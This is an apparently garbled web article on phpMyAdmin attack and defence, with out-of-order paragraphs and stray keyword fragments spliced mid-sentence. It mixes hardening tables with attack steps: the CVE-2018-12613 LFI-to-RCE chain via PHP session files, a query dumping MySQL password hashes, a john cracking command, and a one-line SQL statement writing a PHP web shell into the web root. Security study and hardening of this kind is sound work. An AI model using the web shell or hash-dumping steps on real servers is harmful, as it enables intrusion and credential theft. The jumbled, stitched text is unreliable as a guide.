| Control | Verification Method | |---------|---------------------| | Change default URL (e.g., /securePMA123/ ) | Fuzzer fails to find | | auth_type = 'cookie' or 'http' | No auto-login | | AllowDeny rules in Apache: Require ip 10.0.0.0/8 | External scans blocked | | Set $cfg['Servers'][$i]['hide_db'] = 'information_schema' | Reduces leak | | Disable LOAD_FILE and INTO OUTFILE globally | secure_file_priv = "/dev/null" | | Apply MySQL/MariaDB security patches | No UDF privilege escalation |
The famous CVE-2018-12613 is a Local File Inclusion vulnerability that could be exploited in older phpMyAdmin versions (4.8.0, 4.8.0.1, 4.8.1).
Improperly configured web servers may expose the phpMyAdmin configuration file ( config.inc.php ). If downloadable or readable via a Local File Inclusion (LFI) vulnerability elsewhere on the server, this file may contain hardcoded credentials or the blowfish_secret passphrase used for cookie encryption. 3. Post-Authentication Exploitation (Authorized Access)
Requires FILE privilege and appropriate OS permissions (e.g., MySQL running as root, or weak directory permissions). phpmyadmin hacktricks verified
You can turn this LFI into code execution by executing a SQL query containing a PHP payload (e.g., SELECT ''; ), finding your current PHP session ID via cookies, and including the session file located in /var/lib/php/sessions/sess_[YOUR_SESSION_ID] . Executing Arbitrary SQL Queries
SELECT user, host, authentication_string FROM mysql.user;
If this is active, navigating to the phpMyAdmin URL will automatically log you in as the pre-configured user (often root ) without prompting for credentials. Setup Directory Exposure This article serves as a definitive
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";
| Risk | Mitigation Strategy | | :--- | :--- | | | Immediately change the default root password for MySQL and create strong, unique passwords for all phpMyAdmin users. | | Weak Configuration | Set $cfg['Servers'][$i]['AllowNoPassword'] = false . Never use auth_type='config' in a production, network-accessible environment. Remove or restrict access to the /setup/ directory. | | Outdated Software | Regularly update phpMyAdmin to the latest stable version to patch known SQLi and RCE vulnerabilities. | | Unrestricted Access | Restrict access to the phpMyAdmin URL to trusted IP addresses or require VPN access for administrative functions. |
Utilize web application firewalls (WAF) or reverse proxy authentication layers in front of phpMyAdmin. verified guide to phpMyAdmin security
Locate the /doc/html/index.html or similar files to identify the version and check for known CVEs.
Attackers can escalate LFI to RCE by injecting PHP payloads into the database and including the resulting session file (e.g., /var/lib/php5/sess_ SQL Injection (SQLi):
phpMyAdmin is arguably the most widely deployed open-source tool for MySQL and MariaDB database administration. Its ubiquity, however, makes it a primary target for attackers, both internal and external. While platforms like HackTricks provide excellent aggregated for post-exploitation, a truly effective security assessment requires verified, actionable intelligence. This article serves as a definitive, verified guide to phpMyAdmin security, covering crucial vulnerabilities, exploitation methodologies, and robust mitigation strategies.
This injection could be used to read sensitive information from the database, including user password hashes.
mysql_native_password hashes crackable with john --format=mysql-sha1 hash.txt .